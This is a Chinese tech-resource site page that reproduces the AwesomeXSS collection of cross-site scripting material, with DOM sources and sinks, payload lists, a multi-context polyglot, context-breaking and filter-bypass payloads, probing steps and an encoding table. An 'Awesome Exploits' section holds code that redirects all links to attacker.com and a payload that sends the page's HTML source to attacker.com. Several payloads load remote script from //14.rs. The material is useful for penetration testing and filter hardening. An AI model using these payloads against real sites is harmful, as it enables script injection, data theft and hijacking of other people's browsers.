跳转到主要内容

标签(标签)

资源精选(342) Go开发(108) Go语言(103) Go(99) angular(82) LLM(78) 大语言模型(63) 人工智能(53) 前端开发(50) LangChain(43) golang(43) 机器学习(39) Go工程师(38) Go程序员(38) Go开发者(36) React(33) Go基础(29) Python(24) Vue(22) Web开发(20) Web技术(19) 精选资源(19) 深度学习(19) Java(18) ChatGTP(17) Cookie(16) android(16) 前端框架(13) JavaScript(13) Next.js(12) 安卓(11) 聊天机器人(10) typescript(10) 资料精选(10) NLP(10) 第三方Cookie(9) Redwoodjs(9) ChatGPT(9) LLMOps(9) Go语言中级开发(9) 自然语言处理(9) PostgreSQL(9) 区块链(9) mlops(9) 安全(9) 全栈开发(8) OpenAI(8) Linux(8) AI(8) GraphQL(8) iOS(8) 软件架构(7) RAG(7) Go语言高级开发(7) AWS(7) C++(7) 数据科学(7) whisper(6) Prisma(6) 隐私保护(6) JSON(6) DevOps(6) 数据可视化(6) wasm(6) 计算机视觉(6) 算法(6) Rust(6) 微服务(6) 隐私沙盒(5) FedCM(5) 智能体(5) 语音识别(5) Angular开发(5) 快速应用开发(5) 提示工程(5) Agent(5) LLaMA(5) 低代码开发(5) Go测试(5) gorm(5) REST API(5) kafka(5) 推荐系统(5) WebAssembly(5) GameDev(5) CMS(5) CSS(5) machine-learning(5) 机器人(5) 游戏开发(5) Blockchain(5) Web安全(5) Kotlin(5) 低代码平台(5) 机器学习资源(5) Go资源(5) Nodejs(5) PHP(5) Swift(5) devin(4) Blitz(4) javascript框架(4) Redwood(4) GDPR(4) 生成式人工智能(4) Angular16(4) Alpaca(4) 编程语言(4) SAML(4) JWT(4) JSON处理(4) Go并发(4) 移动开发(4) 移动应用(4) security(4) 隐私(4) spring-boot(4) 物联网(4) nextjs(4) 网络安全(4) API(4) Ruby(4) 信息安全(4) flutter(4) RAG架构(3) 专家智能体(3) Chrome(3) CHIPS(3) 3PC(3) SSE(3) 人工智能软件工程师(3) LLM Agent(3) Remix(3) Ubuntu(3) GPT4All(3) 软件开发(3) 问答系统(3) 开发工具(3) 最佳实践(3) RxJS(3) SSR(3) Node.js(3) Dolly(3) 移动应用开发(3) 低代码(3) IAM(3) Web框架(3) CORS(3) 基准测试(3) Go语言数据库开发(3) Oauth2(3) 并发(3) 主题(3) Theme(3) earth(3) nginx(3) 软件工程(3) azure(3) keycloak(3) 生产力工具(3) gpt3(3) 工作流(3) C(3) jupyter(3) 认证(3) prometheus(3) GAN(3) Spring(3) 逆向工程(3) 应用安全(3) Docker(3) Django(3) R(3) .NET(3) 大数据(3) Hacking(3) 渗透测试(3) C++资源(3) Mac(3) 微信小程序(3) Python资源(3) JHipster(3) 语言模型(2) 可穿戴设备(2) JDK(2) SQL(2) Apache(2) Hashicorp Vault(2) Spring Cloud Vault(2) Go语言Web开发(2) Go测试工程师(2) WebSocket(2) 容器化(2) AES(2) 加密(2) 输入验证(2) ORM(2) Fiber(2) Postgres(2) Gorilla Mux(2) Go数据库开发(2) 模块(2) 泛型(2) 指针(2) HTTP(2) PostgreSQL开发(2) Vault(2) K8s(2) Spring boot(2) R语言(2) 深度学习资源(2) 半监督学习(2) semi-supervised-learning(2) architecture(2) 普罗米修斯(2) 嵌入模型(2) productivity(2) 编码(2) Qt(2) 前端(2) Rust语言(2) NeRF(2) 神经辐射场(2) 元宇宙(2) CPP(2) 数据分析(2) spark(2) 流处理(2) Ionic(2) 人体姿势估计(2) human-pose-estimation(2) 视频处理(2) deep-learning(2) kotlin语言(2) kotlin开发(2) burp(2) Chatbot(2) npm(2) quantum(2) OCR(2) 游戏(2) game(2) 内容管理系统(2) MySQL(2) python-books(2) pentest(2) opengl(2) IDE(2) 漏洞赏金(2) Web(2) 知识图谱(2) PyTorch(2) 数据库(2) reverse-engineering(2) 数据工程(2) swift开发(2) rest(2) robotics(2) ios-animation(2) 知识蒸馏(2) 安卓开发(2) nestjs(2) solidity(2) 爬虫(2) 面试(2) 容器(2) C++精选(2) 人工智能资源(2) Machine Learning(2) 备忘单(2) 编程书籍(2) angular资源(2) 速查表(2) cheatsheets(2) SecOps(2) mlops资源(2) R资源(2) DDD(2) 架构设计模式(2) 量化(2) Hacking资源(2) 强化学习(2) flask(2) 设计(2) 性能(2) Sysadmin(2) 系统管理员(2) Java资源(2) 机器学习精选(2) android资源(2) android-UI(2) Mac资源(2) iOS资源(2) Vue资源(2) flutter资源(2) JavaScript精选(2) JavaScript资源(2) Rust开发(2) deeplearning(2) RAD(2)
SEO Title

这个存储库是 Awesome XSS 资源的集合。 欢迎投稿,并应通过问题提交。

Awesome contents

Awesome Challenges

Awesome Reads & Presentations

Awesome Tools

Awesome XSS Mind Maps

A beautiful XSS mind map by Jack Masa, here

Awesome DOM XSS

  • Does your input go into a sink? Vulnerable
  • It doesn't? Not vulnerable

Source: An input that could be controlled by an external (untrusted) source.

document.URL
document.documentURI
document.URLUnencoded (IE 5.5 or later Only)
document.baseURI
location
location.href
location.search
location.hash
location.pathname
document.cookie
document.referrer
window.name
history.pushState()
history.replaceState()
localStorage
sessionStorage

Sink: A potentially dangerous method that could lead to a vulnerability. In this case a DOM Based XSS.

eval
Function
setTimeout
setInterval
setImmediate
execScript
crypto.generateCRMFRequest
ScriptElement.src
ScriptElement.text
ScriptElement.textContent
ScriptElement.innerText
anyTag.onEventName
document.write
document.writeln
anyElement.innerHTML
Range.createContextualFragment
window.location
document.location

This comprehensive list of sinks and source is taken from domxsswiki.

Awesome Payloads

<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
<d3"<"/onclick="1>[confirm``]"<">z
<d3/onmouseenter=[2].find(confirm)>z
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javas&#99;ript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>

Awesome Polyglots

Here's an XSS polyglot that I made which can break out of 20+ contexts:

%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`

Explanation of how it works, here

Awesome Tags & Event Handlers

Some less detected event handlers

ontoggle
onauxclick
ondblclick
oncontextmenu
onmouseleave
ontouchcancel

Some HTML Tags that you will be using

img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video

Awesome Context Breaking

HTML Context

Case: <tag>You searched for $input. </tag>

<svg onload=alert()>
</tag><svg onload=alert()>

Attribute Context

Case: <tag attribute="$input">

"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()

JavaScript Context

Case: <script> var new something = '$input'; </script>

'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>

Awesome Confirm Variants

Yep, confirm because alert is too mainstream.

confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)

Awesome Exploits

Replace all links
Array.from(document.getElementsByTagName("a")).forEach(function(i) {
  i.href = "https://attacker.com";
});
Source Code Stealer
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

A good compilation of advanced XSS exploits can be found here

Awesome Probing

If nothing of this works, take a look at Awesome Bypassing section

First of all, enter a non-malicious string like d3v and look at the source code to get an idea about number and contexts of reflections.
Now for attribute context, check if double quotes (") are being filtered by entering x"d3v. If it gets altered to x&quot;d3v, chances are that output is getting properly escaped. If this happens, try doing the same for single quotes (') by entering x'd3v, if it gets altered to x&apos;, you are doomed. The only thing you can try is encoding.
If the quotes are not being filtered, you can simply try payloads from Awesome Context Breaking section.
For javascript context, check which quotes are being used for example if they are doing

variable = 'value' or variable = "value"

Now lets say single quotes (') are in use, in that case enter x'd3v. If it gets altered to x\'d3v, try escaping the backslash () by adding a backslash to your probe i.e. x\'d3v. If it works use the following payload:

\'-alert()//

But if it gets altered to x\\\'d3v, the only thing you can try is closing the script tag itself by using

</script><svg onload=alert()>

For simple HTML context, the probe is x<d3v. If it gets altered to x&gt;d3v, proper sanitization is in place. If it gets reflected as it as, you can enter a dummy tag to check for potential filters. The dummy tag I like to use is x<xxx>. If it gets stripped or altered in any way, it means the filter is looking for a pair of < and >. It can simply bypassed using

<svg onload=alert()//

or this (it will not work in all cases)

<svg onload=alert()

If the your dummy tags lands in the source code as it is, go for any of these payloads

<svg onload=alert()>
<embed src=//14.rs>
<details open ontoggle=alert()>

Awesome Bypassing

Note: None of these payloads use single (') or double quotes (").

  • Without event handlers
<object data=javascript:confirm()>
<a href=javascript:confirm()>click here
<script src=//14.rs></script>
<script>confirm()</script>
  • Without space
<svg/onload=confirm()>
<iframe/src=javascript:alert(1)>
  • Without slash (/)
<svg onload=confirm()>
<img src=x onerror=confirm()>
  • Without equal sign (=)
<script>confirm()</script>
  • Without closing angular bracket (>)
<svg onload=confirm()//
  • Without alert, confirm, prompt
<script src=//14.rs></script>
<svg onload=co\u006efirm()>
<svg onload=z=co\u006efir\u006d,z()>
  • Without a Valid HTML tag
<x onclick=confirm()>click here
<x ondrag=aconfirm()>drag it
  • Bypass tag blacklisting
</ScRipT>
</script
</script/>
</script x>

Awesome Encoding

HTML Char Numeric Description Hex CSS (ISO) JS (Octal) URL
&quot; " &#34; quotation mark u+0022 \0022 \42 %22
&num; # &#35; number sign u+0023 \0023 \43 %23
&dollar; $ &#36; dollar sign u+0024 \0024 \44 %24
&percnt; % &#37; percent sign u+0025 \0025 \45 %25
&amp; & &#38; ampersand u+0026 \0026 \46 %26
&apos; ' &#39; apostrophe u+0027 \0027 \47 %27
&lpar; ( &#40; left parenthesis u+0028 \0028 \50 %28
&rpar; ) &#41; right parenthesis u+0029 \0029 \51 %29
&ast; * &#42; asterisk u+002A \002a \52 %2A
&plus; + &#43; plus sign u+002B \002b \53 %2B
&comma; , &#44; comma u+002C \002c \54 %2C
&minus; - &#45; hyphen-minus u+002D \002d \55 %2D
&period; . &#46; full stop; period u+002E \002e \56 %2E
&sol; / &#47; solidus; slash u+002F \002f \57 %2F
&colon; : &#58; colon u+003A \003a \72 %3A
&semi; ; &#59; semicolon u+003B \003b \73 %3B
&lt; < &#60; less-than u+003C \003c \74 %3C
&equals; = &#61; equals u+003D \003d \75 %3D
&gt; > &#62; greater-than sign u+003E \003e \76 %3E
&quest; ? &#63; question mark u+003F \003f \77 %3F
&commat; @ &#64; at sign; commercial at u+0040 \0040 \100 %40
&lsqb; [ &#91; left square bracket u+005B \005b \133 %5B
&bsol; \ &#92; backslash u+005C \005c \134 %5C
&rsqb; ] &#93; right square bracket u+005D \005d \135 %5D
&Hat; ^ &#94; circumflex accent u+005E \005e \136 %5E
&lowbar; _ &#95; low line u+005F \005f \137 %5F
&grave; ` &#96; grave accent u+0060 \0060 \u0060 %60
&lcub; { &#123; left curly bracket u+007b \007b \173 %7b
&verbar; | &#124; vertical bar u+007c \007c \174 %7c
&rcub; } &#125; right curly bracket u+007d \007d \175 %7d

Awesome Tips & Tricks

  • http(s):// can be shortened to // or /\\ or \\.
  • document.cookie can be shortened to cookie. It applies to other DOM objects as well.
  • alert and other pop-up functions don't need a value, so stop doing alert('XSS') and start doing alert()
  • You can use // to close a tag instead of >.
  • I have found that confirm is the least detected pop-up function so stop using alert.
  • Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use <script src=//14.rs> instead of <script src="//14.rs">
  • The shortest HTML context XSS payload is <script src=//14.rs> (19 chars)

原文:https://github.com/s0md3v/AwesomeXSS